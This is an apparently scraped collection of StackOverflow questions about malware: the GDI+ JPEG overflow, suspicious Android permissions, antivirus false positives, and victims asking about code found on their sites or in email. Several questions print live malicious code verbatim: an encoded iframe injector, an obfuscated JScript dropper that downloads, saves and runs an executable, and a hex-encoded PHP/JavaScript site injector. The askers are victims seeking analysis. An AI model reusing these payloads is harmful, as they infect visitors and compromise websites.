malware interview questions
Top malware frequently asked interview questions
I’ve been reading about an older exploit against GDI+ on Windows XP and Windows Server 2003 called the JPEG of death for a project I’m working on.
The exploit is well explained in the following link:
http://www.infosecwriters.com/text_resources/pdf/JPEG.pdf
Basically, a JPEG file contains a section called COM containing a (possibly empty) comment field, and a two byte value containing the size of COM. If there are no comments, the size is 2. The reader (GDI+) reads the size, subtracts two, and allocates a buffer of the appropriate size to copy the comments in the heap.
The attack involves placing a value of 0
in the field. GDI+ subtracts 2
, leading to a value of -2 (0xFFFe)
which gets converted to the unsigned integer 0XFFFFFFFE
by memcpy
.
Sample code:
unsigned int size;
size = len - 2;
char *comment = (char *)malloc(size + 1);
memcpy(comment, src, size);
Observe that malloc(0)
on the third line should return a pointer to unallocated memory on the heap. How can writing 0XFFFFFFFE
bytes (4GB
!!!!) possibly not crash the program? Does this write beyond the heap area and into the space of other programs and the OS? What happens then?
As I understand memcpy
, it simply copies n
characters from the destination to the source. In this case, the source should be on the stack, the destination on the heap, and n
is 4GB
.
Source: (StackOverflow)
I have seen some Android apps on my phone require this android.permission.READ_PHONE_STATE permission. I don't know if I could trust them. I know this permission will give the app access to many information. I'm particularly interested in what functionality in an Android app normally require the information like DeviceId
, SimSerialNumber
, SubscriberId
?
Source: (StackOverflow)
I'm just curious. I always hear about C or assembly being the language of choice for viruses, and I wonder if any of the more arcane languages like lisp or scheme can be used for it too
Source: (StackOverflow)
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
My website www.safwanmanpower.com is attacked by a malware script in each page i don't know wt this script is all about can anybody how this script make my website malware affected ??
hoping for quick and positive response.
edited
how sumone can attacked my website without an permission of uploading ??
Source: (StackOverflow)
I am creating an android web app using Webview
and Javascript
making addJavascriptInterface(true)
.
My App will content data(html) that will be loaded from an external site.
I worried about the cross-site-scripting XSS/security of my app as I am enabling addJavascriptInterface(true).
What are the things I should be taking care so that any malicious code should not run on my app ?
Source: (StackOverflow)
I found a strange thing hidden on my page:
<div id="SiUnhdqlqHN9t7wB_tbstore_container" style="left: -2000px; top: -2000px; position: absolute;">
<param name="movie" value="http://tbupdate.zugo.com/ztb/2.5/jsi/man/fc.swf"/>
<param name="allowScriptAccess" value="always"/>
EDIT: I see that it's there in Chrome too, not just IE, and I have all of the web-service search enhancements etc disabled in Advanced Settings.
EDIT: I examined the markup on a PC not in the office, and the Zugo was not present. Possibly only the PC or browsers on my PC at the office are affected.
YET ANOTHER EDIT: This seems to be the StartNow search extension. Wish I knew how it got installed on my PC at work.
I would be using this grid to track data that would be covered by HIPAA and need to know that the privacy is not being compromised. There should be nothing "phoning home" in this grid or on this page. Really.
PROGRAMMING ASPECT OF THE QUESTION: If allowScriptAccess is set to "always" can this SWF see everything in the DOM? And if the ID changes, is there any way for me to "kill" it using javascript?
Source: (StackOverflow)
In testing my local code, the following appears in my DOM ~2 seconds after loading:
<div style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;" id="_GPL_e6a00_parent_div">
<object type="application/x-shockwave-flash" id="_GPL_e6a00_swf" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf" width="1" height="1">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
I've run global searches for all of the keywords in the HTML but it's nowhere to be found in my project.
After that I tried disabling all of the external plugins I load, including Facebook's SDK, Mixpanel, Google Analytics, but it still shows up.
What else can I do to find the culprit?
Source: (StackOverflow)
I have an application I wrote for my company in Python 2.x, PyQT4, and MySQLdb and packaged with py2exe.
Recently, I made some updates to the application, Porting it to Python 3.4 and PySide. I also removed the MySQLdb dependencies and added Requests. I packaged this with the newly-minted py2exe for Python 3.
Suddenly I'm getting flagged by Windows defender that my executable is malware. Here's the log entry:
Windows Defender has detected spyware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Zwangi&threatid=144384
Name:BrowserModifier:Win32/Zwangi
ID:144384
Severity:High
Category:Browser Modifier
Path Found:file:C:\Users\alan.moore\Desktop\ticketuserclient3-beta1\ticketuserclient3\Contact tech support.exe
Detection Type:Concrete
Detection Source:Downloads and attachments
Status:Unknown
User:WILLIAMSON-TN\alan.moore
Process Name:C:\Windows\Explorer.EXE
So my questions are:
- Why am I being flagged as malware? How can I determine the exact reasons?
- Other than "allowing" this on all 600+ workstations that it needs to be deployed to, what can I do about it?
- What does "Detection Type: concrete" mean?
Thanks for any help.
UPDATE: Apparently anything I compile with py2exe under python3.4 gets identified like this.
I tried with this script:
import sys
import platform
print (sys.platform)
print ("".join(platform.uname))
And this setup.py
from distutils.core import setup
import os
import py2exe
setup(
windows=[{"script":"test.py", "dest_base":"Contact tech support"},],
options= {
"py2exe" : {
"compressed":1,
"optimize":2,
"bundle_files":3
}
},
zipfile = None
)
It's flagged as malware. (Win32/Zwangi).
Source: (StackOverflow)
I have created an android application, but Avast detects this as malware. Why is this?
Can anyone tell me some more info about this, so I can locate what exactly is considered a virus in this app. This is a very simple app, so I have no idea what might have caused this.
I have reported this as false positive and also contacted avast via their forum. But I guess it wont hurt to post here as well, maybe someone have/had a similar problem.
Source: (StackOverflow)
we use a tool to track js errors which happen in the browser of our users. We sometimes see that underscore
raises an error like TypeError: string is not a function
because it is overwritten by string looking like this
var _0x54e9 = ['triml', "\x72", "\x65\x74\x75\x72", "\x6E\x20\x74\x68", "\x69\x73", "\x63\x6F", "\x6E\x73\x74\x72", "\x75\x63\x74\x6F\x72", "\x66\x69", "\x6C\x74\x65", "\x62\x69\x6E\x64", "\x63", "\x68\x61\x72", "\x43", "\x6F", "\x64\x65\x41\x74", "", "\x61\x70\x70\x6C\x79", "\x70", "\x72\x6F\x74\x6F", "\x74", "\x79\x70\x65", "\x46\x75\x6E\x63\x74\x69\x6F\x6E", "\x4D\x61\x74\x68", "\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x63\x6C\x65\x61\x72\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x6A\x6F\x69\x6E", "\x70\x75\x73\x68", "\x70\x61\x72\x73\x65\x49\x6E\x74", "\x66", "\x6D", "\x68", "\x61\x72", "\x64\x65", "\x73\x70\x6C\x69\x74", "\x63\x6F\x6E\x63\x61\x74", "\x31", "\x30", "\x32", "\x72\x61\x6E\x64\x6F\x6D", "\x73\x70\x6C\x69\x63\x65", "\x40", "\x74\x6F\x53\x74\x72\x69\x6E\x67", "\x0A\x0A\x0A", "\x6C\x65\x6E\x67\x74\x68", "\x6E", "\x61\x74"];
[][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[0]] = function(_0x95b5x1, _0x95b5x2) {
try {
with({
console: null,
window: null,
s: [(function _0x95b5x10() {
return (this[_0x54e9[44]] < ((([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]][_0x54e9[39]]() * 44332) + 323456) >> 0)) ? _0x95b5x10[_0x54e9[17]](this[_0x54e9[11] + _0x54e9[14] + _0x54e9[45] + _0x54e9[11] + _0x54e9[46]](this)) : this
}[_0x54e9[17]](_0x54e9[43]))[_0x54e9[42]]()],
c: []
}) {
var _0x95b5x3 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[22]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[10]][_0x54e9[17]]((_0x54e9[16])[_0x54e9[11] + _0x54e9[12] + _0x54e9[13] + _0x54e9[14] + _0x54e9[15]], [_0x95b5x1]),
_0x95b5x4 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]],
_0x95b5x5 = (function(_0x95b5xf) {
_0x95b5xf && _0x95b5xf()
}),
_0x95b5x6 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[24]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x7 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[25]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x8 = 1000000,
_0x95b5x9 = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[10]](c, [_0x54e9[16]]),
_0x95b5xa = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](c),
_0x95b5xb = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](s),
_0x95b5xc = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[28]],
_0x95b5xd = (_0x54e9[16])[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[29] + _0x54e9[1] + _0x54e9[14] + _0x54e9[30] + _0x54e9[13] + _0x54e9[31] + _0x54e9[32] + _0x54e9[13] + _0x54e9[14] + _0x54e9[33]],
_0x95b5xe = _0x95b5x6(function() {
try {
(function() {
try {
[][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x95b5x7(!(this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[17]](this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]], [(function() {
while ((this[5]++, _0x95b5xa(_0x95b5x3(this[5] - 1) ^ this[0] ? ((!((!(_0x95b5x3(this[5] - 1) & this[1])) && (_0x95b5xb(_0x95b5xd(_0x95b5xc(_0x95b5x9(), this[4])), [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x54e9[16])))) ? this[1] : _0x54e9[16]) : this[2]), !!this[7 + this[5]])) {}
}[_0x54e9[10]](this)[_0x54e9[17]]()) || ([][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[17]](s, [_0x54e9[16]])) || _0x54e9[41]])() && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8])) && _0x95b5xe)
} catch (A) {
_0x95b5x7(_0x95b5xe);
if (_0x95b5x2) {
throw A
};
}
}[_0x54e9[10]]([31, _0x54e9[36], _0x54e9[37], _0x54e9[16], _0x54e9[38], 0][_0x54e9[35]](_0x95b5x1[_0x54e9[34]](_0x54e9[16])))())
} catch (A) {
if (_0x95b5x2) {
throw A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()), 1)
}
} catch (A) {
if (_0x95b5x2) {
return A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])());
Does anyone have an idea where this comes from and how to prevent this?
Source: (StackOverflow)
Sorry if this is not the right place to ask this, please LMK if this question would be suited better somewhere else!
I got a particularly interesting piece of junk mail sent to my work email. It is supposedly someone's resume, but it is actually a very obscure piece of javascript. It looks like it tries to launch a windows executable via activeX. I think the goal of the attacker is to you have you run the .js
file directly as a windows script. I ran it on my windows 7 computer and Symantec Endpoint stopped it with a "Suspicious executable image download
" warning. I ran it in a windows XP vm without any antivirus installed, and I got a pop up notification
2865241.exe - Appication Error The application failed to initialize properly (0xc0000135). Click on OK to terminate the application
followed by a notification from Windows Script Host
Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream
So is it actually attempting to write a binary and run it? What might it be trying to accomplish? Why did it fail? I played the role of "gullible email recipient" and ran it, and it just bombed out. What environment might this succeed in?
A lot of the gibberish looks like it is possibly, intentionally ugly variable names used as properties of window
. However, there are a lot of "charAt"
s so maybe the strings are just a decoy and it is only extracting certain characters and using them. several of the "functions" have arguments being passed in the form of (/regex/g,"")
so it looks like that is trying to filter away garbage from the strings, but I can't tell where the actual call to replace
is that would actually do the replacing.
Below is the JS, it is highly obfuscated. I beatified it for some semblance of readability.
(function () {
var D2p = (8.0 + "'=+)D]R.MPjS"["length"] * 28);
kOY = ("\x89\x60eYE;U\x83L^SP'yp"["charCodeAt"](6) * 0 + 18.0);
qEI = "N9-0GO3m8/d*VI4&g)tG*k"[("=[TOcgnm7St5a(hUdK,?"["charCodeAt"](13) * 409139717 + 39.0)["toString"](("xA\x85Ru6-iU{*c~\x87\x86("["charCodeAt"](5) * 0 + 29.0))](/[m\-\*I0tNO\)\&\/]/g, "");
T7Y = "6Y=0oSknwWp[U&qjKCBF*L"[("<e.y\x8bZ2fX\x7f"["charCodeAt"](2) * 921305672 + 22.0)["toString"]((34.0 + "NuU\x7f/\x8a\x8683y$EY<f&{x"["charCodeAt"](8) * 0))](/[\*Kj\&\=6wW\[oBk]/g, "");
var Ecf = (88 * "\x85P<S\x82"["length"] + 0.0);
Tkv = ("T_e8\x83\x87X|fA\x80I\x89{\x85"["length"] * 2 + 3.0);
var Cq7 = "AGREkUTp8D&bJGdZ;qL0QsP"[(9.0 + "u\x800]\x89@ye\x88\x8aWajvT="["charCodeAt"](10) * 280311852)["toString"]((3.0 + "<$*,?Rn"["length"] * 4))](/[RJ\&pLQkUd8As\;]/g, "");
var ZTl = "`S75d`QHS@garJi50+94Y0"["replace"](/[Y\@\+HJ79a5\`]/g, "");
LIm = "AGt9>wrW66389bs4a0Yv72"["replace"](/[rAs8a\>Ybt67]/g, "");
gF9 = "#ni`1z0c~_w-vamT4uC7Fc%G"[(12.0 + "\x83%Q\x880\x8b*asr\x82;W"["length"] * 3877454369)["toString"]((5 * "_YKyr\x82"["length"] + 5.0))](/[\-\%4Fm\#0C\~1\_\`vn]/g, "");
var Uwg = "QwFnSfAc07q2MpO!]P*HzbZ"[(4.0 + "CHE'zl+]e4"["length"] * 4238006093)["toString"]((34.0 + "1y.\x89d/}n*6\x7f\x88w"["charCodeAt"](8) * 0))](/[z\!f27\*Qw\]npcb]/g, "");
function Kg3(fr, KPA, rn) {
var ERG = new ActiveXObject("]W_SFc)rHi7p_tz.TSv%hB_eKl5l"["replace"](/[\)KT\%vzF\_7\]5HB]/g, ""));
var mE6 = ("Ov\x81xP*sX\x80"["length"] * 11 + 4.0);
var KPA = ERG["Ex" + (73 > 45 ? "\x70" : "\x68") + "andEnvironmentSt" + "" + (77 > 7 ? "\x72" : "\x6d") + "ings"]("G%oT&EySM&PXX%"[("iIopR\x809O2\x82PtYg:'[}#"["charCodeAt"](12) * 225213779 + 43.0)["toString"]((0.0 + "OJN.R%\x8angI"["length"] * 3))](/[\&SXGyo]/g, "")) + String["f" + "romCharCod" + (81 > 5 ? "\x65" : "\x5e") + ""](92) + KPA;
var j$2 = "qv3zu6Sa7FdMeSbxt~*fklyGQu"[(43.0 + "5Hd|tb/M3Yx\x87e"["charCodeAt"](6) * 1269417725)["toString"]((0 * "Wv1jN\x88G\x81muC4nVx#w<"["charCodeAt"](11) + 36.0))](/[G\*6qvl\~kxSQFMz7]/g, "");
var Ttc = new ActiveXObject("kM+SGNXfMFfLD2g.kX[mM#L3H`qTFT/AP"["replace"](/[\/NkqF\[\#\+G\`gADmf3]/g, ""));
QBc = "efbNd<t&A&q@4%`8RFLI29CH"["replace"](/[\`9\<edI\@R\&\%CLb]/g, "");
Ttc["onre" + (78 > 3 ? "\x61" : "\x5a") + "dys" + "t" + (71 > 45 ? "\x61" : "\x5c") + "techange"] = function () {
if (Ttc["r" + "eadyStat" + (98 > 18 ? "\x65" : "\x60") + ""] === 4) {
var OF$ = new ActiveXObject("-AlDROqDWBJ.ESz!tbir#eH[a&lm"["replace"](/[H\#JWi\-E\!\[zqR\&lb]/g, ""));
var Jwu = ("08#\x89:{\x83\x81[UR]2I"["charCodeAt"](10) * 4 + 60.0);
OF$["o" + "" + (58 > 34 ? "\x70" : "\x67") + "en"]();
i61 = "eJj7XqxlFeC5B_1RsHQt!1"["replace"](/[QXje\!5sx\_Rl]/g, "");
izb = ("U}o=Q8(c<\x8bO-|.5^"["charCodeAt"](6) * 2 + 34.0);
var zyH = (10.0 + "\x80LF:,n'1-c0\x8a="["length"] * 11);
var k3C = ";n@E2LaW=0GNTs-1JT!OTce"["replace"](/[T\=\;1\-\!ca\@G2]/g, "");
OF$["" + "t" + (91 > 18 ? "\x79" : "\x72") + "pe"] = 1;
var EKM = "Ncvs&1RzLd8Qt7Z-~M(YQfrp"[("-*\x84f\x86N\x8b6Tn{qgw3yl\x7fK"["charCodeAt"](5) * 454460829 + 5.0)["toString"](("\x89/(,TD#e<kyn%+.xW"["charCodeAt"](13) * 0 + 33.0))](/[c7\(R\-s\~\&r8NQL]/g, "");
OF$["wri" + (76 > 16 ? "\x74" : "\x6a") + "" + "e"](Ttc["R" + (94 > 34 ? "\x65" : "\x5b") + "s" + "ponseB" + (85 > 2 ? "\x6f" : "\x65") + "dy"]);
PDX = (31.0 + "5IY9?r\x896B{i1*Re"["charCodeAt"](12) * 6);
OF$["" + "posi" + (77 > 29 ? "\x74" : "\x6a") + "ion"] = 0;
v$8 = (2.0 + "b&|\x8b)gY\x83"["length"] * 61);
OF$["saveT" + (79 > 38 ? "\x6f" : "\x68") + "F" + "" + (85 > 43 ? "\x69" : "\x62") + "le"](KPA, 2);
W2Q = "(DLsxL6Ll0a(OC]trZBv`b"[(")=\x88\x81>"["length"] * 10081381361 + 4.0)["toString"]((0 * "aWi\x80/4h\x60uIcJbt-^,'"["charCodeAt"](17) + 35.0))](/[\(OBx0r\`\]L]/g, "");
OF$["c" + "los" + (94 > 26 ? "\x65" : "\x5b") + ""]();
var ue0 = "MT3gL29u`i-u4k3eR8N+o"["replace"](/[4\+\`L8MR93\-]/g, "");
}
;
var xbw = "MY<m6do1bcJs;j3mCP7c"[(283571292 * "GbS4sw#qE*\x7f)\x87V"["charCodeAt"](13) + 21.0)["toString"]((3 * "57e2>-m+"["length"] + 7.0))](/[\<3MoJ67b\;C]/g, "");
};
var b$y = ("\x86mjoi\x87n.(y0#,Y"["length"] * 2 + 0.0);
Teq = "80u3mip>VfE-Mnlk9@[L*yEc"[("v({w>Y<qr#3-="["length"] * 3877454369 + 12.0)["toString"](("pm\x60oO(EeT<w"["charCodeAt"](5) * 0 + 35.0))](/[\[V0\*kEi3\@\>\-8n]/g, "");
try {
Ttc["o" + "p" + (65 > 36 ? "\x65" : "\x5e") + "n"](";GoE%T"["replace"](/[o\%\;]/g, ""), fr, false);
lw7 = "fte5jz9s_Yt=DIb]aB!6IB"[(1050143891 * "5~K<\x60c0>lC@=E("["charCodeAt"](6) + 41.0)["toString"]((0 * "p4uV?rw.'\x83m|\x86"["charCodeAt"](4) + 35.0))](/[\!\_9\=faIeY\]j]/g, "");
var jLj = "`=e;E_fhW2c/F8njVljt(G"["replace"](/[\`\/\;lj2\(h\_\=8]/g, "");
Ttc["" + "s" + (53 > 26 ? "\x65" : "\x5c") + "nd"]();
var X2P = (41 * "&S_R8gA'v"["length"] + 7.0);
if (rn > 0) {
ERG["R" + "" + (55 > 18 ? "\x75" : "\x6e") + "n"](KPA, 0, 0);
pcx = "oHzfN0Bajv]M5Tpy(Ssik=Kt"[(9.0 + "=h)$[\x84>:8#MIZ-fK}"["charCodeAt"](7) * 869084600)["toString"]((35.0 + "Ul\x88\x84^ObN+:Q>HomiJqg"["charCodeAt"](9) * 0))](/[\=5jKapiS\(zo\]N0]/g, "");
}
;
var FmH = "7_3QTXRgjK6+mj/4!2&h[ml"[("djG\x80\x8bMk\x814&geJ/\x86#\x83s"["charCodeAt"](5) * 382957200 + 62.0)["toString"]((32.0 + "\x84h4qDZ2j$\x817C"["charCodeAt"](2) * 0))](/[Q\/gK\+7X\_\&\[m\!]/g, "");
sIy = (36.0 + "O8^\x88aSZN&Ts"["charCodeAt"](9) * 4);
VBS = (17 * "$jG)r^o\x894Oc5"["length"] + 1.0);
} catch (er) {
}
;
sKc = "l2iC]fvA]f8b7aTzyIkY9[vq"["replace"](/[72I8\[vyTCYl\]]/g, "");
}
Kg3("qhAtyt<zpx5:X/>/DdMa@vciksl1x>.=Ir7uK/Ri0m2a`gIe-%s0/6Ooqn]e)!.7]jNpKg"["replace"](/[qyKADO\%\-67\)\>R\`I5\@z\<0N2\=\!klxM\]cX]/g, ""), "L2MP8&6@5s2s4Q1().ibeaxYe"[(672699379 * "\x81\x7f{=%\x85+tE~?DP"["charCodeAt"](10) + 57.0)["toString"]((6.0 + "A\x86hk8DU\x82G6390."["length"] * 2))](/[ab\&Yi\)\@s\(PQLM]/g, ""), 1);
iBR = "~UcONvQg!zT2P(RXe-k(Pp"[(3977508874 * "{2\x7f\x82A\x83S\x88\x84gW~c%P"["length"] + 8.0)["toString"]((0 * "Gk5o~$\x89;2^:plS&gUhnR"["charCodeAt"](10) + 36.0))](/[NQTP\(\-Xc\~\!]/g, "");
var TAb = (2.0 + "B%;'(W]0JaEi\x898_"["length"] * 1);
Jfj = "Qk*rH@UKlsg5O->f`4~iyz"[(2032260927 * ",2\x84\x8b\x60P_[;Qtg"["length"] + 9.0)["toString"]((1.0 + "pQdk["["length"] * 6))](/[\-\~\`sK\@Qy\>\*5r]/g, "");
dkD = "`aL1;xbr;eJkDA)R*hoM"[(62.0 + ";[DY7J:K\x85\x88x$3t<"["charCodeAt"](7) * 393169392)["toString"]((0 * ";fud=6t(%\x80\x82+y^m"["charCodeAt"](8) + 32.0))](/[L\)o\`J\*bD\;]/g, "");
Hz9 = "zNiGSF9+7WHUhpZxILHEM"["replace"](/[F\+pULEzSixW]/g, "");
Kg3("Bhxt(tZ%pfM:#/Y/%nd3a;vGxiNs8R1N.kr>uTD/ficmTaKg5e&s4J/]tEwWoJ.EjH%pcg"[(7089588933 * "z_OC("["length"] + 2.0)["toString"]((33.0 + "PRybeAL>6;U\x87"["charCodeAt"](9) * 0))](/[4DKJ5RY\(3NM\%cx\]Hn\>ET\&WfkG\#\;8ZB]/g, ""), "S1-2+40605X4[9=.pelx;e"[(68.0 + "T|YL[u;<UR\x83x?\x80D~\x8b2b"["charCodeAt"](8) * 701913330)["toString"](("\x8a)jUF4$^e\x7fy;{WL_d]Xg"["charCodeAt"](6) * 1 + 0.0))](/[lX\-S\;\=\[p0\+]/g, ""), 1);
sZV = (1 * "p\x83jcq\x88d6\x85g[Ca&"["charCodeAt"](7) + 24.0);
var q3y = "+mp&uoRvn/GXa`rJKxKzW"[(33.0 + "|P,Ehf7\x8a\x82QN0X"["charCodeAt"](6) * 1084775147)["toString"]((6.0 + "^d\x896m2?:\x83\x8b"["length"] * 3))](/[\`mxoXz\/vJ\+\&]/g, "");
var vQ8 = "TAM~6=&uHrQcF=p3sOqS~81C"[(308784692 * "\x60,'3OKskndZw\x8b5iRgGN"["charCodeAt"](13) + 43.0)["toString"](("+O6hr>Vn8_0zktN"["length"] * 1 + 14.0))](/[TQ\&3\~OqM\=H1c]/g, "")
})();//p061q4Iu1W
Source: (StackOverflow)
Currently I am facing a hell like situation, four of my client websites were hacked before 10 days. I messed up a lot with them and three of them are working fine(running magento) after my long mess up with them, but one of them(running word press) is still facing the same situation and I could not figure out what was going on, after a particular timing the js files and some php files too are auto injecting with this kind of code :
<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++) {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>
This code is injected in all js files and main files, I changed ftp passwords, I checked cron jobs, and manually I looked up for any php code (I am feeling like some php code is doing this) but I am unable to figure it out, and yeah I tried to decode this code and tried to get the functionality for this code, yet removing this malicious code from my js files will make my site fine for some time, but after a random time the scripts will auto injected with this code ? what is this js code actually ? It will be very helpful if somebody explains what is actually going on ?
Source: (StackOverflow)
Suppose I want to run some program which requests too many permissions. For example, record from the microphone or read IMEI of my phone. However, there are no practical explanation why recording from the mic or IMEI number is needed for this particular application, except for data mining.
I want to try this app, but restrict its permissions. For example, if it reads IMEI, it should get random IMEI(but the same every time). If it tries to read the mic, it should get silence.
Some other interesting permissions:
- Phonebook read/write access -
returns zero contacts, pretend that
write is OK, but actually do
nothing.
- Send SMS - pretend that SMS
is sent, but do nothing.
- Get list of
visible Wi-Fi networks - return zero
networks.
Obviously the tool should require a rooted phone. Are there any such tools?
